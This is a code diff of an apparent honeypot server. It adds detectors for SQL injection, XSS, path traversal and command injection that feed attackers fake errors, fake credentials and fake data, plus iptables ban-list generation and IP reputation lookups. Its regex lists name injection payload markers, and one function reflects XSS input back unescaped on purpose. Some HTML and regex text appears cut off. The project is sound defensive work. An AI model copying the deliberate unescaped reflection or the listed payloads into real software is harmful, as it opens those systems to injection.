"{num}" in output: + output = output.replace("{num}", str(_sysrand.randint(1, 99))) + else: + generic_outputs = ["", "Command executed successfully", "sh: syntax error"] + output = secrets.choice(generic_outputs) + + return (output, "text/plain", 200) + + +def detect_sql_injection_pattern(query_string: str) -> Optional[str]: + """Detect SQL injection patterns in query string""" + if not query_string: + return None + + query_lower = query_string.lower() + + patterns = { + "quote": [r"'", r'"', r"`"], + "comment": [r"--", r"#", r"/\*", r"\*/"], + "union": [r"\bunion\b", r"\bunion\s+select\b"], + "boolean": [r"\bor\b.*=.*", r"\band\b.*=.*", r"'.*or.*'.*=.*'"], + "time_based": [r"\bsleep\b", r"\bwaitfor\b", r"\bdelay\b", r"\bbenchmark\b"], + "stacked": [r";.*select", r";.*drop", r";.*insert", r";.*update", r";.*delete"], + "command": [r"\bexec\b", r"\bexecute\b", r"\bxp_cmdshell\b"], + "info_schema": [r"information_schema", r"table_schema", r"table_name"], + } + + for injection_type, pattern_list in patterns.items(): + for pattern in pattern_list: + if re.search(pattern, query_lower): + logger.debug(f"SQL injection pattern '{injection_type}' detected") + return injection_type + + return None + + +def get_random_sql_error( + db_type: str = None, injection_type: str = None +) -> Tuple[str, str]: + """Generate a random SQL error message""" + wl = get_wordlists() + sql_errors = wl.sql_errors + + if not sql_errors: + return ("Database error occurred", "text/plain") + + if not db_type: + db_type = secrets.choice(list(sql_errors.keys())) + + db_errors = sql_errors.get(db_type, {}) + + if injection_type and injection_type in db_errors: + errors = db_errors[injection_type] + elif "generic" in db_errors: + errors = db_errors["generic"] + else: + all_errors = [] + for error_list in db_errors.values(): + if isinstance(error_list, list): + all_errors.extend(error_list) + errors = all_errors if all_errors else ["Database error occurred"] + + error_message = secrets.choice(errors) if errors else "Database error occurred" + + if "{table}" in error_message: + tables = ["users", "products", "orders", "customers", "accounts", "sessions"] + error_message = error_message.replace("{table}", secrets.choice(tables)) + + if "{column}" in error_message: + columns = ["id", "name", "email", "password", "username", "created_at"] + error_message = error_message.replace("{column}", secrets.choice(columns)) + + return (error_message, "text/plain") + + +def generate_sql_error_response( + query_string: str, db_type: str = None +) -> Tuple[Optional[str], Optional[str], Optional[int]]: + """Generate SQL error response for detected injection attempts""" + injection_type = detect_sql_injection_pattern(query_string) + + if not injection_type: + return (None, None, None) + + error_message, content_type = get_random_sql_error(db_type, injection_type) + + status_code = 500 + + if _sysrand.random() < 0.3: + status_code = 200 + + logger.info(f"SQL injection detected: {injection_type}") + return (error_message, content_type, status_code) + + +def get_sql_response_with_data(path: str, params: str) -> str: + """Generate fake SQL query response with data""" + injection_type = detect_sql_injection_pattern(params) + + if injection_type in ["union", "boolean", "stacked"]: + data = { + "success": True, + "results": [ + { + "id": i, + "username": random_username(), + "email": random_email(), + "password_hash": random_password(), + "role": secrets.choice(["admin", "user", "moderator"]), + } + for i in range(1, _sysrand.randint(2, 5)) + ], + } + return json.dumps(data, indent=2) + + return json.dumps( + {"success": True, "message": "Query executed successfully", "results": []}, + indent=2, + ) + + +def detect_xss_pattern(input_string: str) -> bool: + """Detect XSS patterns in input""" + if not input_string: + return False + + wl = get_wordlists() + xss_pattern = wl.attack_patterns.get("xss_attempt", "") + + if not xss_pattern: + xss_pattern = r"( str: + """Generate response for XSS attempts with reflected content""" + xss_detected = False + reflected_content = [] + + for key, value in input_data.items(): + if detect_xss_pattern(value): + xss_detected = True + reflected_content.append(f"

{key}: {value}

") + + if xss_detected: + logger.info("XSS attempt detected and reflected") + html = f""" + + + + Submission Received + + + +
+

Thank you for your submission!

+

We have received your information:

+ {''.join(reflected_content)} +

We will get back to you shortly.

+
+ + +""" + return html + + return """ + + + + Submission Received + + + +
+

Thank you for your submission!

+

Your message has been received and we will respond soon.

+
+ + +""" + + +def generate_server_error() -> Tuple[str, str]: + """Generate fake server error page""" + wl = get_wordlists() + server_errors = wl.server_errors + + if not server_errors: + return ("500 Internal Server Error", "text/html") + + server_type = secrets.choice(list(server_errors.keys())) + server_config = server_errors[server_type] + + error_codes = { + 400: "Bad Request", + 401: "Unauthorized", + 403: "Forbidden", + 404: "Not Found", + 500: "Internal Server Error", + 502: "Bad Gateway", + 503: "Service Unavailable", + } + + code = secrets.choice(list(error_codes.keys())) + message = error_codes[code] + + template = server_config.get("template", "") + version = secrets.choice(server_config.get("versions", ["1.0"])) + + html = template.replace("{code}", str(code)) + html = html.replace("{message}", message) + html = html.replace("{version}", version) + + if server_type == "apache": + os = secrets.choice(server_config.get("os", ["Ubuntu"])) + html = html.replace("{os}", os) + html = html.replace("{host}", "localhost") + + logger.debug(f"Generated {server_type} server error: {code}") + return (html, "text/html") + + +def get_server_header(server_type: str = None) -> str: + """Get a fake server header string""" + wl = get_wordlists() + server_errors = wl.server_errors + + if not server_errors: + return "nginx/1.18.0" + + if not server_type: + server_type = secrets.choice(list(server_errors.keys())) + + server_config = server_errors.get(server_type, {}) + version = secrets.choice(server_config.get("versions", ["1.0"])) + + server_headers = { + "nginx": f"nginx/{version}", + "apache": f"Apache/{version}", + "iis": f"Microsoft-IIS/{version}", + "tomcat": f"Apache-Coyote/1.1", + } + + return server_headers.get(server_type, "nginx/1.18.0") + + +def detect_and_respond_deception( + path: str, query: str = "", body: str = "", method: str = "GET" +) -> Optional[Tuple[str, str, int]]: + """ + Main deception detection and response function. + Returns (response_body, content_type, status_code) if deception should be applied, None otherwise. + """ + + logger.debug( + f"Checking deception for {method} {path} query={query[:50] if query else 'empty'}" + ) + + if detect_path_traversal(path, query, body): + logger.info(f"Path traversal detected in: {path}") + return generate_path_traversal_response(f"{path}?{query}" if query else path) + + if body and detect_xxe_injection(body): + logger.info(f"XXE injection detected") + return generate_xxe_response(body) + + if detect_command_injection(path, query, body): + logger.info(f"Command injection detected in: {path}") + full_input = f"{path} {query} {body}" + return generate_command_injection_response(full_input) + + return None diff --git a/src/dependencies.py b/src/dependencies.py new file mode 100644 index 0000000..e1f908f --- /dev/null +++ b/src/dependencies.py @@ -0,0 +1,95 @@ +#!/usr/bin/env python3 + +""" +FastAPI dependency injection providers. +Replaces Handler class variables with proper DI. +""" + +import os +from datetime import datetime + +from fastapi import Request +from fastapi.templating import Jinja2Templates + +from config import Config +from tracker import AccessTracker +from database import DatabaseManager, get_database +from logger import get_app_logger, get_access_logger, get_credential_logger + +# Shared Jinja2 templates instance +_templates = None + + +def get_templates() -> Jinja2Templates: + """Get shared Jinja2Templates instance with custom filters.""" + global _templates + if _templates is None: + templates_dir = os.path.join(os.path.dirname(__file__), "templates", "jinja2") + _templates = Jinja2Templates(directory=templates_dir) + _templates.env.filters["format_ts"] = _format_ts + return _templates + + +def _format_ts(value, time_only=False): + """Custom Jinja2 filter for formatting ISO timestamps.""" + if not value: + return "N/A" + if isinstance(value, str): + try: + value = datetime.fromisoformat(value) + except (ValueError, TypeError): + return value + if time_only: + return value.strftime("%H:%M:%S") + if value.date() == datetime.now().date(): + return value.strftime("%H:%M:%S") + return value.strftime("%m/%d/%Y %H:%M:%S") + + +def get_tracker(request: Request) -> AccessTracker: + return request.app.state.tracker + + +def get_app_config(request: Request) -> Config: + return request.app.state.config + + +def get_db() -> DatabaseManager: + return get_database() + + +def get_client_ip(request: Request) -> str: + """Extract client IP address from request, checking proxy headers first.""" + forwarded_for = request.headers.get("X-Forwarded-For") + if forwarded_for: + return forwarded_for.split(",")[0].strip() + + real_ip = request.headers.get("X-Real-IP") + if real_ip: + return real_ip.strip() + + if request.client: + return request.client.host + + return "0.0.0.0" + + +def build_raw_request(request: Request, body: str = "") -> str: + """Build raw HTTP request string for forensic analysis.""" + try: + raw = f"{request.method} {request.url.path}" + if request.url.query: + raw += f"?{request.url.query}" + raw += f" HTTP/1.1\r\n" + + for header, value in request.headers.items(): + raw += f"{header}: {value}\r\n" + + raw += "\r\n" + + if body: + raw += body + + return raw + except Exception as e: + return f"{request.method} {request.url.path} (error building full request: {str(e)})" diff --git a/src/firewall/fwtype.py b/src/firewall/fwtype.py new file mode 100644 index 0000000..0e0e421 --- /dev/null +++ b/src/firewall/fwtype.py @@ -0,0 +1,42 @@ +from abc import ABC, abstractmethod +from typing import Dict, Type + + +class FWType(ABC): + """Abstract base class for firewall types.""" + + # Registry to store child classes + _registry: Dict[str, Type["FWType"]] = {} + + def __init_subclass__(cls, **kwargs): + """Automatically register subclasses with their class name.""" + super().__init_subclass__(**kwargs) + cls._registry[cls.__name__.lower()] = cls + + @classmethod + def create(cls, fw_type: str, **kwargs) -> "FWType": + """ + Factory method to create instances of child classes. + + Args: + fw_type: String name of the firewall type class to instantiate + **kwargs: Arguments to pass to the child class constructor + + Returns: + Instance of the requested child class + + Raises: + ValueError: If fw_type is not registered + """ + fw_type = fw_type.lower() + if fw_type not in cls._registry: + available = ", ".join(cls._registry.keys()) + raise ValueError( + f"Unknown firewall type: '{fw_type}'. Available: {available}" + ) + + return cls._registry[fw_type](**kwargs) + + @abstractmethod + def getBanlist(self, ips): + """Return the ruleset for the specific server""" diff --git a/src/firewall/iptables.py b/src/firewall/iptables.py new file mode 100644 index 0000000..159171e --- /dev/null +++ b/src/firewall/iptables.py @@ -0,0 +1,40 @@ +from typing_extensions import override +from firewall.fwtype import FWType + + +class Iptables(FWType): + + @override + def getBanlist(self, ips) -> str: + """ + Generate iptables ban rules from an array of IP addresses. + + Args: + ips: List of IP addresses to ban + + Returns: + String containing iptables commands, one per line + """ + if not ips: + return "" + + rules = [] + chain = "INPUT" + target = "DROP" + rules.append("#!/bin/bash") + rules.append("# iptables ban rules") + rules.append("") + + for ip in ips: + + ip = ip.strip() + + # Build the iptables command + rule_parts = ["iptables", "-A", chain, "-s", ip] + + # Add target + rule_parts.extend(["-j", target]) + + rules.append(" ".join(rule_parts)) + + return "\n".join(rules) diff --git a/src/firewall/raw.py b/src/firewall/raw.py new file mode 100644 index 0000000..e0c82fe --- /dev/null +++ b/src/firewall/raw.py @@ -0,0 +1,21 @@ +from typing_extensions import override +from firewall.fwtype import FWType + + +class Raw(FWType): + + @override + def getBanlist(self, ips) -> str: + """ + Generate raw list of bad IP addresses. + + Args: + ips: List of IP addresses to ban + + Returns: + String containing raw ips, one per line + """ + if not ips: + return "" + + return "\n".join(ips) diff --git a/src/geo_utils.py b/src/geo_utils.py index d11f01c..1df9904 100644 --- a/src/geo_utils.py +++ b/src/geo_utils.py @@ -1,113 +1,117 @@ #!/usr/bin/env python3 """ -Geolocation utilities for reverse geocoding and city lookups. +Geolocation utilities for IP lookups using ip-api.com. """ import requests -from typing import Optional, Tuple +from typing import Optional, Dict, Any from logger import get_app_logger app_logger = get_app_logger() -# Simple city name cache to avoid repeated API calls -_city_cache = {} - -def reverse_geocode_city(latitude: float, longitude: float) -> Optional[str]: +def fetch_ip_geolocation(ip_address: str) -> Optional[Dict[str, Any]]: """ - Reverse geocode coordinates to get city name using Nominatim (OpenStreetMap). + Fetch geolocation data for an IP address using ip-api.com. + + Results are persisted to the database by the caller (fetch_ip_rep task), + so no in-memory caching is needed. Args: - latitude: Latitude coordinate - longitude: Longitude coordinate + ip_address: IP address to lookup Returns: - City name or None if not found + Dictionary containing geolocation data or None if lookup fails """ - # Check cache first - cache_key = f"{latitude},{longitude}" - if cache_key in _city_cache: - return _city_cache[cache_key] - try: - # Use Nominatim reverse geocoding API (free, no API key required) - url = "https://nominatim.openstreetmap.org/reverse" + url = f"http://ip-api.com/json/{ip_address}" params = { - "lat": latitude, - "lon": longitude, - "format": "json", - "zoom": 10, # City level - "addressdetails": 1, + "fields": "status,message,country,countryCode,region,regionName,city,zip,lat,lon,timezone,isp,org,as,reverse,mobile,proxy,hosting,query" } - headers = {"User-Agent": "Krawl-Honeypot/1.0"} # Required by Nominatim ToS - response = requests.get(url, params=params, headers=headers, timeout=5) + response = requests.get(url, params=params, timeout=5) response.raise_for_status() data = response.json() - address = data.get("address", {}) - # Try to get city from various possible fields - city = ( - address.get("city") - or address.get("town") - or address.get("village") - or address.get("municipality") - or address.get("county") - ) + if data.get("status") != "success": + app_logger.warning( + f"IP lookup failed for {ip_address}: {data.get('message')}" + ) + return None - # Cache the result - _city_cache[cache_key] = city - - if city: - app_logger.debug(f"Reverse geocoded {latitude},{longitude} to {city}") - - return city + app_logger.debug(f"Fetched geolocation for {ip_address}") + return data except requests.RequestException as e: - app_logger.warning(f"Reverse geocoding failed for {latitude},{longitude}: {e}") + app_logger.warning(f"Geolocation API call failed for {ip_address}: {e}") return None except Exception as e: - app_logger.error(f"Error in reverse geocoding: {e}") + app_logger.error(f"Error fetching geolocation for {ip_address}: {e}") return None -def get_most_recent_geoip_data(results: list) -> Optional[dict]: +def extract_geolocation_from_ip(ip_address: str) -> Optional[Dict[str, Any]]: """ - Extract the most recent geoip_data from API results. - Results are assumed to be sorted by record_added (most recent first). + Extract geolocation data for an IP address. Args: - results: List of result dictionaries from IP reputation API + ip_address: IP address to lookup Returns: - Most recent geoip_data dict or None + Dictionary with city, country, lat, lon, and other geolocation data or None """ - if not results: + geoloc_data = fetch_ip_geolocation(ip_address) + if not geoloc_data: return None - # The first result is the most recent (sorted by record_added) - most_recent = results[0] - return most_recent.get("geoip_data") + return { + "city": geoloc_data.get("city"), + "country": geoloc_data.get("country"), + "country_code": geoloc_data.get("countryCode"), + "region": geoloc_data.get("region"), + "region_name": geoloc_data.get("regionName"), + "latitude": geoloc_data.get("lat"), + "longitude": geoloc_data.get("lon"), + "timezone": geoloc_data.get("timezone"), + "isp": geoloc_data.get("isp"), + "org": geoloc_data.get("org"), + "reverse": geoloc_data.get("reverse"), + "is_proxy": geoloc_data.get("proxy"), + "is_hosting": geoloc_data.get("hosting"), + } -def extract_city_from_coordinates(geoip_data: dict) -> Optional[str]: +def fetch_blocklist_data(ip_address: str) -> Optional[Dict[str, Any]]: """ - Extract city name from geoip_data using reverse geocoding. + Fetch blocklist data for an IP address using lcrawl API. Args: - geoip_data: Dictionary containing location_latitude and location_longitude + ip_address: IP address to lookup Returns: - City name or None + Dictionary containing blocklist information or None if lookup fails """ - if not geoip_data: - return None + # This is now used only for ip reputation + try: + api_url = "https://iprep.lcrawl.com/api/iprep/" + params = {"cidr": ip_address} + headers = {"Content-Type": "application/json"} + response = requests.get(api_url, headers=headers, params=params, timeout=10) - latitude = geoip_data.get("location_latitude") - longitude = geoip_data.get("location_longitude") + if response.status_code == 200: + payload = response.json() + if payload.get("results"): + results = payload["results"] + # Get the most recent result (first in list, sorted by record_added) + most_recent = results[0] + list_on = most_recent.get("list_on", {}) - if latitude is None or longitude is None: - return None + app_logger.debug(f"Fetched blocklist data for {ip_address}") + return list_on + except requests.RequestException as e: + app_logger.warning(f"Failed to fetch blocklist data for {ip_address}: {e}") + except Exception as e: + app_logger.error(f"Error processing blocklist data for {ip_address}: {e}") - return reverse_geocode_city(latitude, longitude) + return None diff --git a/src/handler.py b/src/handler.py deleted file mode 100644 index 0a6abb2..0000000 --- a/src/handler.py +++ /dev/null @@ -1,1052 +0,0 @@ -#!/usr/bin/env python3 - -import logging -import random -import time -from datetime import datetime -from http.server import BaseHTTPRequestHandler -from typing import Optional, List -from urllib.parse import urlparse, parse_qs - -from config import Config -from tracker import AccessTracker -from analyzer import Analyzer -from templates import html_templates -from templates.dashboard_template import generate_dashboard -from generators import ( - credentials_txt, - passwords_txt, - users_json, - api_keys_json, - api_response, - directory_listing, - random_server_header, -) -from wordlists import get_wordlists -from sql_errors import generate_sql_error_response, get_sql_response_with_data -from xss_detector import detect_xss_pattern, generate_xss_response -from server_errors import generate_server_error - - -class Handler(BaseHTTPRequestHandler): - """HTTP request handler for the deception server""" - - webpages: Optional[List[str]] = None - config: Config = None - tracker: AccessTracker = None - analyzer: Analyzer = None - counter: int = 0 - app_logger: logging.Logger = None - access_logger: logging.Logger = None - credential_logger: logging.Logger = None - - def _get_client_ip(self) -> str: - """Extract client IP address from request, checking proxy headers first""" - # Headers might not be available during early error logging - if hasattr(self, "headers") and self.headers: - # Check X-Forwarded-For header (set by load balancers/proxies) - forwarded_for = self.headers.get("X-Forwarded-For") - if forwarded_for: - # X-Forwarded-For can contain multiple IPs, get the first (original client) - return forwarded_for.split(",")[0].strip() - - # Check X-Real-IP header (set by nginx and other proxies) - real_ip = self.headers.get("X-Real-IP") - if real_ip: - return real_ip.strip() - - # Fallback to direct connection IP - return self.client_address[0] - - def _get_user_agent(self) -> str: - """Extract user agent from request""" - return self.headers.get("User-Agent", "") - - def _get_category_by_ip(self, client_ip: str) -> str: - """Get the category of an IP from the database""" - return self.tracker.get_category_by_ip(client_ip) - - def _get_page_visit_count(self, client_ip: str) -> int: - """Get current page visit count for an IP""" - return self.tracker.get_page_visit_count(client_ip) - - def _increment_page_visit(self, client_ip: str) -> int: - """Increment page visit counter for an IP and return new count""" - return self.tracker.increment_page_visit(client_ip) - - def version_string(self) -> str: - """Return custom server version for deception.""" - return random_server_header() - - def _should_return_error(self) -> bool: - """Check if we should return an error based on probability""" - if self.config.probability_error_codes <= 0: - return False - return random.randint(1, 100) <= self.config.probability_error_codes - - def _get_random_error_code(self) -> int: - """Get a random error code from wordlists""" - wl = get_wordlists() - error_codes = wl.error_codes - if not error_codes: - error_codes = [400, 401, 403, 404, 500, 502, 503] - return random.choice(error_codes) - - def _parse_query_string(self) -> str: - """Extract query string from the request path""" - parsed = urlparse(self.path) - return parsed.query - - def _handle_sql_endpoint(self, path: str) -> bool: - """ - Handle SQL injection honeypot endpoints. - Returns True if the path was handled, False otherwise. - """ - # SQL-vulnerable endpoints - sql_endpoints = ["/api/search", "/api/sql", "/api/database"] - - base_path = urlparse(path).path - if base_path not in sql_endpoints: - return False - - try: - # Get query parameters - query_string = self._parse_query_string() - - # Log SQL injection attempt - client_ip = self._get_client_ip() - user_agent = self._get_user_agent() - - # Always check for SQL injection patterns - error_msg, content_type, status_code = generate_sql_error_response( - query_string or "" - ) - - if error_msg: - # SQL injection detected - log and return error - self.access_logger.warning( - f"[SQL INJECTION DETECTED] {client_ip} - {base_path} - Query: {query_string[:100] if query_string else 'empty'}" - ) - self.send_response(status_code) - self.send_header("Content-type", content_type) - self.end_headers() - self.wfile.write(error_msg.encode()) - else: - # No injection detected - return fake data - self.access_logger.info( - f"[SQL ENDPOINT] {client_ip} - {base_path} - Query: {query_string[:100] if query_string else 'empty'}" - ) - self.send_response(200) - self.send_header("Content-type", "application/json") - self.end_headers() - response_data = get_sql_response_with_data( - base_path, query_string or "" - ) - self.wfile.write(response_data.encode()) - - return True - - except BrokenPipeError: - # Client disconnected - return True - except Exception as e: - self.app_logger.error(f"Error handling SQL endpoint {path}: {str(e)}") - # Still send a response even on error - try: - self.send_response(500) - self.send_header("Content-type", "application/json") - self.end_headers() - self.wfile.write(b'{"error": "Internal server error"}') - except: - pass - return True - - def generate_page(self, seed: str, page_visit_count: int) -> str: - """Generate a webpage containing random links or canary token""" - - random.seed(seed) - num_pages = random.randint(*self.config.links_per_page_range) - - # Check if this is a good crawler by IP category from database - ip_category = self._get_category_by_ip(self._get_client_ip()) - - # Determine if we should apply crawler page limit based on config and IP category - should_apply_crawler_limit = False - if self.config.infinite_pages_for_malicious: - if ( - ip_category == "good_crawler" or ip_category == "regular_user" - ) and page_visit_count >= self.config.max_pages_limit: - should_apply_crawler_limit = True - else: - if ( - ip_category == "good_crawler" - or ip_category == "bad_crawler" - or ip_category == "attacker" - ) and page_visit_count >= self.config.max_pages_limit: - should_apply_crawler_limit = True - - # If good crawler reached max pages, return a simple page with no links - if should_apply_crawler_limit: - return html_templates.main_page( - Handler.counter, "

Crawl limit reached.

" - ) - - num_pages = random.randint(*self.config.links_per_page_range) - - # Build the content HTML - content = "" - - # Add canary token if needed - if Handler.counter <= 0 and self.config.canary_token_url: - content += f""" - -""" - - # Add links - if self.webpages is None: - for _ in range(num_pages): - address = "".join( - [ - random.choice(self.config.char_space) - for _ in range(random.randint(*self.config.links_length_range)) - ] - ) - content += f""" - -""" - else: - for _ in range(num_pages): - address = random.choice(self.webpages) - content += f""" - -""" - - # Return the complete page using the template - return html_templates.main_page(Handler.counter, content) - - def do_HEAD(self): - """Sends header information""" - self.send_response(200) - self.send_header("Content-type", "text/html") - self.end_headers() - - def do_POST(self): - """Handle POST requests (mainly login attempts)""" - client_ip = self._get_client_ip() - user_agent = self._get_user_agent() - post_data = "" - - from urllib.parse import urlparse - - base_path = urlparse(self.path).path - - if base_path in ["/api/search", "/api/sql", "/api/database"]: - content_length = int(self.headers.get("Content-Length", 0)) - if content_length > 0: - post_data = self.rfile.read(content_length).decode( - "utf-8", errors="replace" - ) - - self.access_logger.info( - f"[SQL ENDPOINT POST] {client_ip} - {base_path} - Data: {post_data[:100] if post_data else 'empty'}" - ) - - error_msg, content_type, status_code = generate_sql_error_response( - post_data - ) - - try: - if error_msg: - self.access_logger.warning( - f"[SQL INJECTION DETECTED POST] {client_ip} - {base_path}" - ) - self.send_response(status_code) - self.send_header("Content-type", content_type) - self.end_headers() - self.wfile.write(error_msg.encode()) - else: - self.send_response(200) - self.send_header("Content-type", "application/json") - self.end_headers() - response_data = get_sql_response_with_data(base_path, post_data) - self.wfile.write(response_data.encode()) - except BrokenPipeError: - pass - except Exception as e: - self.app_logger.error(f"Error in SQL POST handler: {str(e)}") - return - - if base_path == "/api/contact": - content_length = int(self.headers.get("Content-Length", 0)) - if content_length > 0: - post_data = self.rfile.read(content_length).decode( - "utf-8", errors="replace" - ) - - parsed_data = {} - for pair in post_data.split("&"): - if "=" in pair: - key, value = pair.split("=", 1) - from urllib.parse import unquote_plus - - parsed_data[unquote_plus(key)] = unquote_plus(value) - - xss_detected = any(detect_xss_pattern(v) for v in parsed_data.values()) - - if xss_detected: - self.access_logger.warning( - f"[XSS ATTEMPT DETECTED] {client_ip} - {base_path} - Data: {post_data[:200]}" - ) - else: - self.access_logger.info( - f"[XSS ENDPOINT POST] {client_ip} - {base_path}" - ) - - try: - self.send_response(200) - self.send_header("Content-type", "text/html") - self.end_headers() - response_html = generate_xss_response(parsed_data) - self.wfile.write(response_html.encode()) - except BrokenPipeError: - pass - except Exception as e: - self.app_logger.error(f"Error in XSS POST handler: {str(e)}") - return - - self.access_logger.warning( - f"[LOGIN ATTEMPT] {client_ip} - {self.path} - {user_agent[:50]}" - ) - - content_length = int(self.headers.get("Content-Length", 0)) - if content_length > 0: - post_data = self.rfile.read(content_length).decode( - "utf-8", errors="replace" - ) - - self.access_logger.warning(f"[POST DATA] {post_data[:200]}") - - # Parse and log credentials - username, password = self.tracker.parse_credentials(post_data) - if username or password: - # Log to dedicated credentials.log file - timestamp = datetime.now().strftime("%Y-%m-%dT%H:%M:%SZ") - credential_line = f"{timestamp}|{client_ip}|{username or 'N/A'}|{password or 'N/A'}|{self.path}" - self.credential_logger.info(credential_line) - - # Also record in tracker for dashboard - self.tracker.record_credential_attempt( - client_ip, self.path, username or "N/A", password or "N/A" - ) - - self.access_logger.warning( - f"[CREDENTIALS CAPTURED] {client_ip} - Username: {username or 'N/A'} - Path: {self.path}" - ) - - # send the post data (body) to the record_access function so the post data can be used to detect suspicious things. - self.tracker.record_access( - client_ip, self.path, user_agent, post_data, method="POST" - ) - - time.sleep(1) - - try: - self.send_response(200) - self.send_header("Content-type", "text/html") - self.end_headers() - self.wfile.write(html_templates.login_error().encode()) - except BrokenPipeError: - # Client disconnected before receiving response, ignore silently - pass - except Exception as e: - # Log other exceptions but don't crash - self.app_logger.error(f"Failed to send response to {client_ip}: {str(e)}") - - def serve_special_path(self, path: str) -> bool: - """Serve special paths like robots.txt, API endpoints, etc.""" - - # Check SQL injection honeypot endpoints first - if self._handle_sql_endpoint(path): - return True - - try: - if path == "/robots.txt": - self.send_response(200) - self.send_header("Content-type", "text/plain") - self.end_headers() - self.wfile.write(html_templates.robots_txt().encode()) - return True - - if path in ["/credentials.txt", "/passwords.txt", "/admin_notes.txt"]: - self.send_response(200) - self.send_header("Content-type", "text/plain") - self.end_headers() - if "credentials" in path: - self.wfile.write(credentials_txt().encode()) - else: - self.wfile.write(passwords_txt().encode()) - return True - - if path in ["/users.json", "/api_keys.json", "/config.json"]: - self.send_response(200) - self.send_header("Content-type", "application/json") - self.end_headers() - if "users" in path: - self.wfile.write(users_json().encode()) - elif "api_keys" in path: - self.wfile.write(api_keys_json().encode()) - else: - self.wfile.write(api_response("/api/config").encode()) - return True - - if path in ["/admin", "/admin/", "/admin/login", "/login"]: - self.send_response(200) - self.send_header("Content-type", "text/html") - self.end_headers() - self.wfile.write(html_templates.login_form().encode()) - return True - - if path in ["/users", "/user", "/database", "/db", "/search"]: - self.send_response(200) - self.send_header("Content-type", "text/html") - self.end_headers() - self.wfile.write(html_templates.product_search().encode()) - return True - - if path in ["/info", "/input", "/contact", "/feedback", "/comment"]: - self.send_response(200) - self.send_header("Content-type", "text/html") - self.end_headers() - self.wfile.write(html_templates.input_form().encode()) - return True - - if path == "/server": - error_html, content_type = generate_server_error() - self.send_response(500) - self.send_header("Content-type", content_type) - self.end_headers() - self.wfile.write(error_html.encode()) - return True - - if path in ["/wp-login.php", "/wp-login", "/wp-admin", "/wp-admin/"]: - self.send_response(200) - self.send_header("Content-type", "text/html") - self.end_headers() - self.wfile.write(html_templates.wp_login().encode()) - return True - - if path in ["/wp-content/", "/wp-includes/"] or "wordpress" in path.lower(): - self.send_response(200) - self.send_header("Content-type", "text/html") - self.end_headers() - self.wfile.write(html_templates.wordpress().encode()) - return True - - if "phpmyadmin" in path.lower() or path in ["/pma/", "/phpMyAdmin/"]: - self.send_response(200) - self.send_header("Content-type", "text/html") - self.end_headers() - self.wfile.write(html_templates.phpmyadmin().encode()) - return True - - if path.startswith("/api/") or path.startswith("/api") or path in ["/.env"]: - self.send_response(200) - self.send_header("Content-type", "application/json") - self.end_headers() - self.wfile.write(api_response(path).encode()) - return True - - if path in [ - "/backup/", - "/uploads/", - "/private/", - "/admin/", - "/config/", - "/database/", - ]: - self.send_response(200) - self.send_header("Content-type", "text/html") - self.end_headers() - self.wfile.write(directory_listing(path).encode()) - return True - except BrokenPipeError: - # Client disconnected, ignore silently - pass - except Exception as e: - self.app_logger.error(f"Failed to serve special path {path}: {str(e)}") - pass - - return False - - def do_GET(self): - """Responds to webpage requests""" - client_ip = self._get_client_ip() - if self.tracker.is_banned_ip(client_ip): - self.send_response(500) - self.end_headers() - return - user_agent = self._get_user_agent() - - # Handle static files for dashboard - if self.config.dashboard_secret_path and self.path.startswith( - f"{self.config.dashboard_secret_path}/static/" - ): - import os - - file_path = self.path.replace( - f"{self.config.dashboard_secret_path}/static/", "" - ) - static_dir = os.path.join(os.path.dirname(__file__), "templates", "static") - full_path = os.path.join(static_dir, file_path) - - # Security check: ensure the path is within static directory - if os.path.commonpath( - [full_path, static_dir] - ) == static_dir and os.path.exists(full_path): - try: - with open(full_path, "rb") as f: - content = f.read() - self.send_response(200) - if file_path.endswith(".svg"): - self.send_header("Content-type", "image/svg+xml") - elif file_path.endswith(".css"): - self.send_header("Content-type", "text/css") - elif file_path.endswith(".js"): - self.send_header("Content-type", "application/javascript") - else: - self.send_header("Content-type", "application/octet-stream") - self.send_header("Content-Length", str(len(content))) - self.end_headers() - self.wfile.write(content) - return - except Exception as e: - self.app_logger.error(f"Error serving static file: {e}") - - self.send_response(404) - self.send_header("Content-type", "text/plain") - self.end_headers() - self.wfile.write(b"Not found") - return - - if ( - self.config.dashboard_secret_path - and self.path == self.config.dashboard_secret_path - ): - self.send_response(200) - self.send_header("Content-type", "text/html") - self.end_headers() - try: - stats = self.tracker.get_stats() - dashboard_path = self.config.dashboard_secret_path - self.wfile.write(generate_dashboard(stats, dashboard_path).encode()) - except BrokenPipeError: - pass - except Exception as e: - self.app_logger.error(f"Error generating dashboard: {e}") - return - - # API endpoint for fetching all IP statistics - if ( - self.config.dashboard_secret_path - and self.path == f"{self.config.dashboard_secret_path}/api/all-ip-stats" - ): - self.send_response(200) - self.send_header("Content-type", "application/json") - self.send_header("Access-Control-Allow-Origin", "*") - self.send_header( - "Cache-Control", "no-store, no-cache, must-revalidate, max-age=0" - ) - self.send_header("Pragma", "no-cache") - self.send_header("Expires", "0") - self.end_headers() - try: - from database import get_database - import json - - db = get_database() - ip_stats_list = db.get_ip_stats(limit=500) - self.wfile.write(json.dumps({"ips": ip_stats_list}).encode()) - except BrokenPipeError: - pass - except Exception as e: - self.app_logger.error(f"Error fetching all IP stats: {e}") - self.wfile.write(json.dumps({"error": str(e)}).encode()) - return - - # API endpoint for fetching paginated attackers - if self.config.dashboard_secret_path and self.path.startswith( - f"{self.config.dashboard_secret_path}/api/attackers" - ): - self.send_response(200) - self.send_header("Content-type", "application/json") - self.send_header("Access-Control-Allow-Origin", "*") - self.send_header( - "Cache-Control", "no-store, no-cache, must-revalidate, max-age=0" - ) - self.send_header("Pragma", "no-cache") - self.send_header("Expires", "0") - self.end_headers() - try: - from database import get_database - import json - from urllib.parse import urlparse, parse_qs - - db = get_database() - - # Parse query parameters - parsed_url = urlparse(self.path) - query_params = parse_qs(parsed_url.query) - page = int(query_params.get("page", ["1"])[0]) - page_size = int(query_params.get("page_size", ["25"])[0]) - sort_by = query_params.get("sort_by", ["total_requests"])[0] - sort_order = query_params.get("sort_order", ["desc"])[0] - - # Ensure valid parameters - page = max(1, page) - page_size = min(max(1, page_size), 100) # Max 100 per page - - result = db.get_attackers_paginated( - page=page, - page_size=page_size, - sort_by=sort_by, - sort_order=sort_order, - ) - self.wfile.write(json.dumps(result).encode()) - except BrokenPipeError: - pass - except Exception as e: - self.app_logger.error(f"Error fetching attackers: {e}") - self.wfile.write(json.dumps({"error": str(e)}).encode()) - return - - # API endpoint for fetching all IPs (all categories) - if self.config.dashboard_secret_path and self.path.startswith( - f"{self.config.dashboard_secret_path}/api/all-ips" - ): - self.send_response(200) - self.send_header("Content-type", "application/json") - 